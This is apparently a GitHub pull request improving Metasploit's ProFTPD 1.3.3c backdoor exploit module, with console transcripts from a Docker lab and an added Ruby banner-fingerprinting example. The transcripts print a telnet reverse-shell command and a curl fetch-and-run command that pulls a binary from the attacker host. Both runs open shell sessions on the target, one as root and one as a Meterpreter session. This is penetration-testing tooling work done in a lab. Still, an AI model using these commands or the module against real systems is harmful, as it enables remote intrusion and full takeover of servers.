proftpd_133c_backdoor: Various improvements#21381

Open
g0tmi1k wants to merge 9 commits into rapid7:master from g0tmi1k:proftpd_133c_backdoor

Conversation

g0tmi1k (Contributor) commented Apr 27, 2026

This PR is to:

  • Add check function
  • Update module metadata (notes)
  • Update payload (now supports fetch payloads)
  • Able to be more verbose

Setup

$ docker pull registry.gitlab.com/g0tmi1k/proftpd-docker:1.3.3c
[...]
$ 
$ docker run --rm -p 2121:21 -p 40000-40100:40000-40100 --name proftpd registry.gitlab.com/g0tmi1k/proftpd-docker:1.3.3c
957886ff9327 - ProFTPD 1.3.3c (maint) (built Mon Apr 27 2026 11:29:16 UTC) standalone mode STARTUP

Before

$ git checkout master
[...]
$ ./msfconsole -q -x 'db_status; workspace -D; 
setg VERBOSE true; setg RHOSTS 127.0.0.1; setg LHOST docker0;'
[...]
msf > use proftpd_133c_backdoor

Matching Modules
================

   #  Name                                    Disclosure Date  Rank       Check  Description
   -  ----                                    ---------------  ----       -----  -----------
   0  exploit/unix/ftp/proftpd_133c_backdoor  2010-12-02       excellent  No     ProFTPD 1.3.3c Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/proftpd_133c_backdoor

[*] Using exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(unix/ftp/proftpd_133c_backdoor) > options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf exploit(unix/ftp/proftpd_133c_backdoor) > set RPORT 2121
RPORT => 2121
msf exploit(unix/ftp/proftpd_133c_backdoor) > check
[-] This module does not support check.
msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[-] 127.0.0.1:2121 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf exploit(unix/ftp/proftpd_133c_backdoor) > set PAYLOAD payload/cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[+] sh -c '(sleep 3847|telnet 172.17.0.1 4444|while : ; do sh && break; done 2>&1|telnet 172.17.0.1 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 172.17.0.1:4444
[*] 127.0.0.1:2121 - Connecting to FTP server 127.0.0.1:2121...
[*] 127.0.0.1:2121 - Connected to target FTP server.
[*] 127.0.0.1:2121 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 8PW5FyMkatIE2Cdb;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "8PW5FyMkatIE2Cdb\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:36802) at 2026-04-27 12:31:33 +0100

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
^Z
Background session 1? [y/N]  y
msf exploit(unix/ftp/proftpd_133c_backdoor) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         1      0      0      0

msf exploit(unix/ftp/proftpd_133c_backdoor) > vulns

Vulnerabilities
===============

Timestamp                Host       Service  Resource  Name                                       References
---------                ----       -------  --------  ----                                       ----------
2026-04-27 11:31:32 UTC  127.0.0.1  None     {}        ProFTPD 1.3.3c Backdoor Command Execution  CVE-2010-20103,OSVDB-69562,BID-45150

msf exploit(unix/ftp/proftpd_133c_backdoor) >

After

$ git checkout proftpd_133c_backdoor
[...]
$ ./msfconsole -q -x 'db_status; workspace -D;
setg VERBOSE true; setg RHOSTS 127.0.0.1; setg LHOST docker0;'
[...]
msf > use proftpd_133c_backdoor

Matching Modules
================

   #  Name                                    Disclosure Date  Rank       Check  Description
   -  ----                                    ---------------  ----       -----  -----------
   0  exploit/unix/ftp/proftpd_133c_backdoor  2010-12-02       excellent  Yes    ProFTPD 1.3.3c Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/proftpd_133c_backdoor

[*] Using exploit/unix/ftp/proftpd_133c_backdoor
[*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp
msf exploit(unix/ftp/proftpd_133c_backdoor) > options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/linux/http/x86/meterpreter_reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash,
                                              zsh) (Accepted: none, python3.8+, shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           docker0          yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,GET,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      APuvOFYvpZ       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux/Unix Command



View the full module info with the info, or info -d command.

msf exploit(unix/ftp/proftpd_133c_backdoor) > set RPORT 2121
RPORT => 2121
msf exploit(unix/ftp/proftpd_133c_backdoor) > check
[*] 127.0.0.1:2121 - Connecting to FTP server 127.0.0.1:2121...
[*] 127.0.0.1:2121 - Connected to target FTP server.
[*] 127.0.0.1:2121 - FTP Banner: 220 ProFTPD 1.3.3c Server (ProFTPD Docker Installation) [172.17.0.2]
[*] 127.0.0.1:2121 - ProFTPD 1.3.3c detected, testing for backdoor command...
[*] 127.0.0.1:2121 - The target appears to be vulnerable. Sending backdoor command did not return an error (uninfected would/should)
msf exploit(unix/ftp/proftpd_133c_backdoor) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         0      0      0      0

msf exploit(unix/ftp/proftpd_133c_backdoor) > services
Services
========

host       port  proto  name  state  info                                                                  resource  parents
----       ----  -----  ----  -----  ----                                                                  --------  -------
127.0.0.1  2121  tcp    ftp   open   220 ProFTPD 1.3.3c Server (ProFTPD Docker Installation) [172.17.0.2]  {}

msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[*] Command to run on remote host: curl -so ./HoynWYnkdSz http://172.17.0.1:8080/-j0Kg1-XEKLxv08PWln5tg;chmod +x ./HoynWYnkdSz;./HoynWYnkdSz&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /-j0Kg1-XEKLxv08PWln5tg
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] 127.0.0.1:2121 - Running automatic check ("set AutoCheck false" to disable)
[*] 127.0.0.1:2121 - Connecting to FTP server 127.0.0.1:2121...
[*] 127.0.0.1:2121 - Connected to target FTP server.
[*] 127.0.0.1:2121 - FTP Banner: 220 ProFTPD 1.3.3c Server (ProFTPD Docker Installation) [172.17.0.2]
[*] 127.0.0.1:2121 - ProFTPD 1.3.3c detected, testing for backdoor command...
[+] 127.0.0.1:2121 - The target appears to be vulnerable. Sending backdoor command did not return an error (uninfected would/should)
[*] 127.0.0.1:2121 - Connecting to FTP server 127.0.0.1:2121...
[*] 127.0.0.1:2121 - Connected to target FTP server.
[*] 127.0.0.1:2121 - FTP Banner: 220 ProFTPD 1.3.3c Server (ProFTPD Docker Installation) [172.17.0.2]
[*] 127.0.0.1:2121 - Sending backdoor command
[*] 127.0.0.1:2121 - Running: nohup curl -so ./HoynWYnkdSz http://172.17.0.1:8080/-j0Kg1-XEKLxv08PWln5tg;chmod +x ./HoynWYnkdSz;./HoynWYnkdSz& >/dev/null 2>&1
[*] Client 172.17.0.2 requested /-j0Kg1-XEKLxv08PWln5tg
[*] Sending payload to 172.17.0.2 (curl/8.14.1)
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:47446) at 2026-04-27 13:00:45 +0100

meterpreter > background
[*] Backgrounding session 1...
msf exploit(unix/ftp/proftpd_133c_backdoor) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         1      0      0      1

msf exploit(unix/ftp/proftpd_133c_backdoor) > services
Services
========

host       port  proto  name  state  info                                                                  resource  parents
----       ----  -----  ----  -----  ----                                                                  --------  -------
127.0.0.1  2121  tcp    ftp   open   220 ProFTPD 1.3.3c Server (ProFTPD Docker Installation) [172.17.0.2]  {}

msf exploit(unix/ftp/proftpd_133c_backdoor) > vulns

Vulnerabilities
===============

Timestamp                Host       Service         Resource  Name                                    References
---------                ----       -------         --------  ----                                    ----------
2026-04-27 12:00:35 UTC  127.0.0.1  ftp (2121/tcp)  {}        exploit/unix/ftp/proftpd_133c_backdoor  CVE-2010-20103,OSVDB-69562,BID-45150

msf exploit(unix/ftp/proftpd_133c_backdoor) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type                         Data
 ----                     ----       -------  ----  --------  ----                         ----
 2026-04-27 12:00:45 UTC  127.0.0.1                           host.os.session_fingerprint  {:name=>"aa233a48d7f1", :os=>"Debian 13.4 (Linux 6.19.11+kali-amd64)", :arch=>"x64"}

msf exploit(unix/ftp/proftpd_133c_backdoor) >
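
The check this PR adds begins, as the transcript shows, by reading the FTP greeting and matching it against "ProFTPD 1.3.3c" before it probes for the backdoor at all. The Ruby below is an added example, not the module's code or anything from this PR: it implements that banner-fingerprinting step stand-alone over constructed greetings and maps the result onto the three outcomes the module's check can reach before any live probe (version detected, not the affected release, unknown). The `Banner` struct, the regex, the verdict symbols and the sample banners are assumptions of this example; the live backdoor test the module performs next is left out, so a `:detected` result here means "version matches, confirm with the module's check".

```ruby
# Added example, not code from this PR or from the Metasploit module:
# the banner-fingerprinting step of a ProFTPD 1.3.3c check, stand-alone.
# Input is the raw FTP greeting as it arrives on the control connection,
# e.g. "220 ProFTPD 1.3.3c Server (ProFTPD Docker Installation) [172.17.0.2]\r\n".

# Fields pulled out of a ProFTPD-style greeting (struct name and fields are
# assumptions of this example).
Banner = Struct.new(:software, :version, :description, :address, keyword_init: true)

# "220 <software> [<version>] [Server] [(<description>)] [[<address>]]"
# The version is optional because ProFTPD omits it when ServerIdent is off.
BANNER_RE = /\A220 (?<software>[A-Za-z][\w-]*)(?:\s+(?<version>\d+(?:\.\d+)*[a-z]?))?(?:\s+Server)?(?:\s+\((?<description>[^)]*)\))?(?:\s+\[(?<address>[^\]]+)\])?/

# Only the 1.3.3c release carried the backdoor, so the advertised version is
# the first discriminator; anything else is not a candidate for the probe.
AFFECTED_VERSION = '1.3.3c'.freeze

# Returns a Banner, or nil when the greeting cannot be parsed.
def parse_ftp_banner(raw)
  # Greetings may span several "220-" lines and end with a "220 " line; the
  # server identification lives on that final line.
  line = raw.split(/\r?\n/).find { |l| l.start_with?('220 ') }
  return nil unless line

  m = BANNER_RE.match(line)
  return nil unless m

  Banner.new(software: m[:software], version: m[:version],
             description: m[:description], address: m[:address])
end

# Classifies a greeting as [:detected, reason], [:not_affected, reason] or
# [:unknown, reason]. :detected means "version matches, run the backdoor
# test to confirm", which is exactly where the module's check continues.
def fingerprint_proftpd(raw_banner)
  banner = parse_ftp_banner(raw_banner)
  return [:unknown, 'no parseable 220 greeting'] if banner.nil?
  return [:unknown, "not ProFTPD (#{banner.software})"] unless banner.software.casecmp?('proftpd')
  return [:unknown, 'ProFTPD, but version not advertised (ServerIdent off?)'] if banner.version.nil?

  if banner.version == AFFECTED_VERSION
    [:detected, "ProFTPD #{AFFECTED_VERSION} detected, backdoor test required to confirm"]
  else
    [:not_affected, "ProFTPD #{banner.version} is not the backdoored #{AFFECTED_VERSION} build"]
  end
end

# Constructed sample greetings (not captured from any real host).
SAMPLE_BANNERS = {
  docker_lab:   "220 ProFTPD 1.3.3c Server (ProFTPD Docker Installation) [172.17.0.2]\r\n",
  multiline:    "220-Welcome to the file server.\r\n220 ProFTPD 1.3.3c Server (Lab) [10.0.0.5]\r\n",
  newer:        "220 ProFTPD 1.3.5e Server (Debian) [::ffff:10.0.0.6]\r\n",
  ident_hidden: "220 ProFTPD Server (Debian) [::ffff:10.0.0.7]\r\n",
  other_daemon: "220 (vsFTPd 3.0.3)\r\n"
}.freeze

if $PROGRAM_NAME == __FILE__
  SAMPLE_BANNERS.each do |name, raw|
    verdict, reason = fingerprint_proftpd(raw)
    puts format('%-13s %-13s %s', name, verdict, reason)
  end
end
```

The same parse can be run over banners already sitting in a service inventory (the `services` table above stores exactly this string in its info column) to list the hosts worth running the module's check against, which is also the list a defender wants: anything still advertising 1.3.3c. In Metasploit terms the three symbols line up with `CheckCode::Detected`, `CheckCode::Safe` and `CheckCode::Unknown`; the "appears to be vulnerable" verdict in the transcript is only reached after the probe this example stops short of.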

g0tmi1k force-pushed the proftpd_133c_backdoor branch 4 times, most recently from bd308de to 53e084a (April 30, 2026 11:58)
g0tmi1k changed the title from "proftpd_133c_backdoor: Add check and fetch payloads" to "proftpd_133c_backdoor: Various improvements" (May 4, 2026)
g0tmi1k force-pushed the proftpd_133c_backdoor branch 5 times, most recently from be9061b to 60e8337 (May 5, 2026 17:47)
g0tmi1k (Contributor, Author) commented May 5, 2026

This now needs #21380 to be merged ahead of time.

g0tmi1k force-pushed the proftpd_133c_backdoor branch 4 times, most recently from 019d56c to 5464e8d (May 6, 2026 13:59)
g0tmi1k force-pushed the proftpd_133c_backdoor branch from ab7e620 to 3320003 (May 6, 2026 16:28)